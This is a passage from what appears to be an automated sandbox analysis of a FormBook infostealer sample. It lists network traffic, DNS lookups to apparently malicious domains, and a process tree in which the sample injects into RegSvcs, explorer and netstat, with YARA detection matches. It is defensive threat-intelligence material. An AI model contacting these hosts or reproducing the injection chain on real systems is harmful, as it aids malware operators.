                                         Nov 29, 2022 18:25:32.606439114 CET | 80 | 49721 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:32.606645107 CET | 80 | 49721 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:32.606683016 CET | 80 | 49721 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:32.606717110 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:32.606791973 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:32.856290102 CET | 80 | 49721 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:32.856455088 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:33.490314960 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:36.508388996 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:42.519331932 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:42.913681030 CET | 80 | 49722 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:42.913929939 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:42.914102077 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:43.308163881 CET | 80 | 49722 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:43.308239937 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:43.925580978 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:44.097312927 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:44.491835117 CET | 80 | 49722 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:44.491909027 CET | 80 | 49722 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:44.492044926 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:44.494973898 CET | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:44.942090988 CET | 49723 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:45.283199072 CET | 80 | 49722 | 154.209.6.241 | 192.168.2.6
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Nov 29, 2022 18:25:06.826121092 CET | 59504 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:25:06.849574089 CET | 53 | 59504 | 8.8.8.8 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.510191917 CET | 65198 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:25:12.532123089 CET | 53 | 65198 | 8.8.8.8 | 192.168.2.6
                                         Nov 29, 2022 18:25:21.723710060 CET | 62910 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:25:21.755763054 CET | 53 | 62910 | 8.8.8.8 | 192.168.2.6
                                         Nov 29, 2022 18:25:30.897186995 CET | 63863 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:25:31.068085909 CET | 53 | 63863 | 8.8.8.8 | 192.168.2.6
                                         Nov 29, 2022 18:25:50.761020899 CET | 63229 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:25:50.808146954 CET | 53 | 63229 | 8.8.8.8 | 192.168.2.6
                                         Nov 29, 2022 18:26:01.743686914 CET | 62538 | 53 | 192.168.2.6 | 8.8.8.8
                                         Nov 29, 2022 18:26:01.772579908 CET | 53 | 62538 | 8.8.8.8 | 192.168.2.6
                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                         Nov 29, 2022 18:25:06.826121092 CET | 192.168.2.6 | 8.8.8.8 | 0x2214 | Standard query (0) | www.ope-cctv.com | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:12.510191917 CET | 192.168.2.6 | 8.8.8.8 | 0x7524 | Standard query (0) | www.dersameh.com | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:21.723710060 CET | 192.168.2.6 | 8.8.8.8 | 0x2444 | Standard query (0) | www.darkchocolatebliss.com | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:30.897186995 CET | 192.168.2.6 | 8.8.8.8 | 0xa02a | Standard query (0) | www.y31jaihdb6zm87.buzz | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:50.761020899 CET | 192.168.2.6 | 8.8.8.8 | 0xeb7d | Standard query (0) | www.marketmall.digital | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:26:01.743686914 CET | 192.168.2.6 | 8.8.8.8 | 0xd179 | Standard query (0) | www.canadianlocalbusiness.com | A (IP address) | IN (0x0001) | false
                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                         Nov 29, 2022 18:25:06.849574089 CET | 8.8.8.8 | 192.168.2.6 | 0x2214 | No error (0) | www.ope-cctv.com | | 38.55.236.89 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:12.532123089 CET | 8.8.8.8 | 192.168.2.6 | 0x7524 | No error (0) | www.dersameh.com | | 89.31.143.1 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:21.755763054 CET | 8.8.8.8 | 192.168.2.6 | 0x2444 | No error (0) | www.darkchocolatebliss.com | | 54.38.220.85 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:31.068085909 CET | 8.8.8.8 | 192.168.2.6 | 0xa02a | No error (0) | www.y31jaihdb6zm87.buzz | | 154.209.6.241 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:25:50.808146954 CET | 8.8.8.8 | 192.168.2.6 | 0xeb7d | No error (0) | www.marketmall.digital | | 162.213.255.142 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:26:01.772579908 CET | 8.8.8.8 | 192.168.2.6 | 0xd179 | No error (0) | www.canadianlocalbusiness.com | | 172.67.148.132 | A (IP address) | IN (0x0001) | false
                                         Nov 29, 2022 18:26:01.772579908 CET | 8.8.8.8 | 192.168.2.6 | 0xd179 | No error (0) | www.canadianlocalbusiness.com | | 104.21.29.63 | A (IP address) | IN (0x0001) | false
                                        • www.ope-cctv.com
                                        • www.dersameh.com
                                        • www.darkchocolatebliss.com
                                        • www.y31jaihdb6zm87.buzz
                                        • www.marketmall.digital
                                        • www.canadianlocalbusiness.com

                                        Target ID:0
                                        Start time:18:24:01
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Imagebase:0x12a25d20000
                                        File size:275456 bytes
                                        MD5 hash:4F9C8432B57FA1AA875071DE547BA947
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Target ID:1
                                        Start time:18:24:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
                                        Imagebase:0x830000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:2
                                        Start time:18:24:05
                                        Start date:29/11/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff647860000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:10
                                        Start time:18:24:38
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Imagebase:0x1010000
                                        File size:32768 bytes
                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        No disassembly